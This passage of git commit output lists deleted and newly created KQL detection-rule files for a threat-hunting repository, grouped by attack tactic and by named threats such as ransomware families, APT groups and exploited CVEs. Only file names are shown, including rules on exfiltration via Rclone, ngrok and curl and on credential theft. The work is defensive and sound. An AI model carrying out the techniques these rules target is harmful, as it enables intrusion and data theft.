Execution/Suspicious_Schtasks_Schedule_Types.kql delete mode 100644 Execution/Suspicious_Script_Execution_From_Temp_Folder.kql delete mode 100644 Execution/Suspicious_Spool_Service_Child_Process.kql delete mode 100644 Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql delete mode 100644 Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql delete mode 100644 Execution/Suspicious_WSMAN_Provider_Image_Loads.kql delete mode 100644 Execution/Suspicious_WindowsTerminal_Child_Processes.kql delete mode 100644 Execution/Suspicious_WmiPrvSE_Child_Process.kql delete mode 100644 Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql delete mode 100644 Execution/Suspicious_ZipExec_Execution.kql delete mode 100644 Execution/Sysprep_on_AppData_Folder.kql delete mode 100644 Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Tasks_Folder_Evasion.kql delete mode 100644 Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql delete mode 100644 Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql delete mode 100644 Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql delete mode 100644 Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql delete mode 100644 Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql delete mode 100644 Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql delete mode 100644 Execution/Unusual_Parent_Process_For_Cmd.EXE.kql delete mode 100644 Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql delete mode 100644 Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql delete mode 100644 Execution/Use_of_FSharp_Interpreters.kql delete mode 100644 Execution/Use_of_OpenConsole.kql delete mode 100644 Execution/Use_of_Pcalua_For_Execution.kql delete mode 100644 Execution/Use_of_Scriptrunner.exe.kql delete mode 100644 Execution/Using_SettingSyncHost.exe_as_LOLBin.kql delete mode 100644 Execution/VBA_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/VMToolsd_Suspicious_Child_Process.kql delete mode 100644 Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql delete mode 100644 Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql delete mode 100644 Execution/WMIC_Remote_Command_Execution.kql delete mode 100644 Execution/WSL_Child_Process_Anomaly.kql delete mode 100644 Execution/WScript_or_CScript_Dropper_-_File.kql delete mode 100644 Execution/Wab_Execution_From_Non_Default_Location.kql delete mode 100644 Execution/Weak_or_Abused_Passwords_In_CLI.kql delete mode 100644 Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql delete mode 100644 Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/WmiPrvSE_Spawned_A_Process.kql delete mode 100644 Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql delete mode 100644 Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql delete mode 100644 Execution/Wscript_Shell_Run_In_CommandLine.kql delete mode 100644 Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql delete mode 100644 Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql delete mode 100644 Execution/Wusa_Extracting_Cab_Files.kql delete mode 100644 Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql delete mode 100644 Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql delete mode 100644 Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql delete mode 100644 Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql delete mode 100644 Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql delete mode 100644 Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql delete mode 100644 Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql delete mode 100644 Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql delete mode 100644 Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql delete mode 100644 Exfiltration/Email_Exifiltration_Via_Powershell.kql delete mode 100644 Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql delete mode 100644 Exfiltration/Exports_Registry_Key_To_a_File.kql delete mode 100644 Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql delete mode 100644 Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql delete mode 100644 Exfiltration/Network_Connection_Initiated_To_Visual_Studio_Code_Tunnels_Domain.kql delete mode 100644 Exfiltration/PUA_-_Rclone_Execution.kql delete mode 100644 Exfiltration/Process_Initiated_Network__Connection_To_Ngrok_Domain.kql delete mode 100644 Exfiltration/Rclone_Config_File_Creation.kql delete mode 100644 Exfiltration/Suspicious_PowerShell_Mailbox_Export_to_Share.kql delete mode 100644 Exfiltration/Suspicious_Redirection_to_Local_Admin_Share.kql delete mode 100644 Exfiltration/Suspicious_WebDav_Client_Execution_Via_Rundll32.EXE.kql delete mode 100644 Exfiltration/Tap_Installer_Execution.kql delete mode 100644 Exfiltration/WebDav_Client_Execution_Via_Rundll32.EXE.kql delete mode 100644 Impact/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Impact/All_Backups_Deleted_Via_Wbadmin.EXE.kql delete mode 100644 Impact/Backup_Files_Deleted.kql delete mode 100644 Impact/Boot_Configuration_Tampering_Via_Bcdedit.EXE.kql delete mode 100644 Impact/Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql delete mode 100644 Impact/Delete_All_Scheduled_Tasks.kql delete mode 100644 Impact/Delete_Important_Scheduled_Task.kql delete mode 100644 Impact/Deleted_Data_Overwritten_Via_Cipher.EXE.kql delete mode 100644 Impact/Deletion_of_Volume_Shadow_Copies_via_WMI_with_PowerShell.kql delete mode 100644 Impact/Disable_Important_Scheduled_Task.kql delete mode 100644 Impact/File_Recovery_From_Backup_Via_Wbadmin.EXE.kql delete mode 100644 Impact/Fsutil_Suspicious_Invocation.kql delete mode 100644 Impact/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql delete mode 100644 Impact/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql delete mode 100644 Impact/Network_Communication_With_Crypto_Mining_Pool.kql delete mode 100644 Impact/New_Root_or_CA_or_AuthRoot_Certificate_to_Store.kql delete mode 100644 Impact/Portable_Gpg.EXE_Execution.kql delete mode 100644 Impact/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql delete mode 100644 Impact/Potential_Crypto_Mining_Activity.kql delete mode 100644 Impact/Potential_File_Overwrite_Via_Sysinternals_SDelete.kql delete mode 100644 Impact/Potential_Ransomware_Activity_Using_LegalNotice_Message.kql delete mode 100644 Impact/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql delete mode 100644 Impact/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql delete mode 100644 Impact/Registry_Disable_System_Restore.kql delete mode 100644 Impact/Renamed_Gpg.EXE_Execution.kql delete mode 100644 Impact/Renamed_Sysinternals_Sdelete_Execution.kql delete mode 100644 Impact/Sensitive_File_Access_Via_Volume_Shadow_Copy_Backup.kql delete mode 100644 Impact/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql delete mode 100644 Impact/Stop_Windows_Service_Via_Net.EXE.kql delete mode 100644 Impact/Stop_Windows_Service_Via_PowerShell_Stop-Service.kql delete mode 100644 Impact/Stop_Windows_Service_Via_Sc.EXE.kql delete mode 100644 Impact/Suspicious_Creation_TXT_File_in_User_Desktop.kql delete mode 100644 Impact/Suspicious_Execution_of_Shutdown.kql delete mode 100644 Impact/Suspicious_Execution_of_Shutdown_to_Log_Out.kql delete mode 100644 Impact/Suspicious_Reg_Add_BitLocker.kql delete mode 100644 Impact/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql delete mode 100644 Impact/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql delete mode 100644 Impact/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql delete mode 100644 Impact/Windows_Backup_Deleted_Via_Wbadmin.EXE.kql delete mode 100644 Initial Access/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql delete mode 100644 Initial Access/HTML_Help_HH.EXE_Suspicious_Child_Process.kql delete mode 100644 Initial Access/ISO_File_Created_Within_Temp_Folders.kql delete mode 100644 Initial Access/ISO_or_Image_Mount_Indicator_in_Recent_Files.kql delete mode 100644 Initial Access/Office_Macro_File_Creation.kql delete mode 100644 Initial Access/Office_Macro_File_Creation_From_Suspicious_Process.kql delete mode 100644 Initial Access/Office_Macro_File_Download.kql delete mode 100644 Initial Access/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Initial Access/Phishing_Pattern_ISO_in_Archive.kql delete mode 100644 Initial Access/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_ScreenConnect_Installation_Execution.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_ScreenConnect_Server_Web_Shell_Execution.kql delete mode 100644 Initial Access/Remote_Access_Tool_-_Team_Viewer_Session_Started_On_Windows_Host.kql delete mode 100644 Initial Access/Shell_Process_Spawned_by_Java.EXE.kql delete mode 100644 Initial Access/Suspicious_Child_Process_Of_SQL_Server.kql delete mode 100644 Initial Access/Suspicious_Child_Process_Of_Veeam_Dabatase.kql delete mode 100644 Initial Access/Suspicious_Double_Extension_File_Execution.kql delete mode 100644 Initial Access/Suspicious_Execution_From_Outlook_Temporary_Folder.kql delete mode 100644 Initial Access/Suspicious_File_Drop_by_Exchange.kql delete mode 100644 Initial Access/Suspicious_HH.EXE_Execution.kql delete mode 100644 Initial Access/Suspicious_HWP_Sub_Processes.kql delete mode 100644 Initial Access/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql delete mode 100644 Initial Access/Suspicious_Microsoft_OneNote_Child_Process.kql delete mode 100644 Initial Access/Suspicious_Processes_Spawned_by_Java.EXE.kql delete mode 100644 Initial Access/Suspicious_Processes_Spawned_by_WinRM.kql delete mode 100644 Initial Access/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql delete mode 100644 Initial Access/Terminal_Service_Process_Spawn.kql delete mode 100644 Initial Access/Unusual_Child_Process_of_dns.exe.kql delete mode 100644 Initial Access/Unusual_File_Deletion_by_Dns.exe.kql delete mode 100644 Initial Access/Unusual_File_Modification_by_dns.exe.kql delete mode 100644 Initial Access/Windows_Registry_Trust_Record_Modification.kql create mode 100644 KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql create mode 100644 KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql create mode 100644 KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql create mode 100644 KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql create mode 100644 KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql create mode 100644 KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql create mode 100644 KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql create mode 100644 KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql create mode 100644 KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql create mode 100644 KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql create mode 100644 KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql create mode 100644 KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql create mode 100644 KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql create mode 100644 KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql create mode 100644 KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql create mode 100644 KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql create mode 100644 KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql create mode 100644 KQL/rules-emerging-threats/Execution/fireball_archer_install.kql create mode 100644 KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql create mode 100644 KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql create mode 100644 KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql create mode 100644 KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql create mode 100644 KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql create mode 100644 KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql create mode 100644 KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/mint_sandstorm_manageengine_suspicious_process_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_37085_suspicious_creation_of_esx_admins_group.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_maze_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_qbot_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_binary_indicator.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_snake_malware_installation_cli_arguments_indicator.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql create mode 100644 KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql create mode 100644 KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql create mode 100644 KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql create mode 100644 KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql create mode 100644 KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql create mode 100644 KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql create mode 100644 KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql create mode 100644 KQL/rules-emerging-threats/Execution/zxshell_malware.kql create mode 100644 KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql create mode 100644 KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql create mode 100644 KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql create mode 100644 KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql create mode 100644 KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql create mode 100644 KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql create mode 100644 KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql create mode 100644 KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql create mode 100644 KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql create mode 100644 KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql 